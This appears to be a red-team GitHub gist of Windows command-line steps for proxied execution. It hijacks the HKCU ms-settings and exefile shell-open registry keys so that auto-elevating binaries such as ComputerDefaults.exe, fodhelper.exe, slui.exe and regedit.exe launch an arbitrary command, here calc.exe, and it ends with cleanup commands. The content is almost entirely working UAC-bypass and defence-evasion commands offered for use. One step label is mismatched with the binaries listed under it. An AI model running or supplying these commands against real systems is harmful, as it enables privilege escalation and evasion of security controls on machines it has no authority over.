Skip to content

Instantly share code, notes, and snippets.

@RedTeams

RedTeams/lolbin_execution.md

Forked from havoc3-3/lolbin_execution.md
Created April 24, 2025 09:06
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save RedTeams/6bd4b8e57b6d2f25104118911554e055 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save RedTeams/6bd4b8e57b6d2f25104118911554e055 to your computer and use it in GitHub Desktop.
Download ZIP
Proxied Execution techniques utilizing registry hijacks.
Raw
lolbin_execution.md

Proxied Execution using ComputerDefaults.exe using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe

Step 3: Cleanup the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f

Proxied Execution using slui.exe, fodhelper.exe, regedit.exe using exefile Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\slui.exe

C:\Windows\System32\fodhelper.exe

C:\Windows\System32\regedit.exe

Step 3: Cleanup the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\exefile /f

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment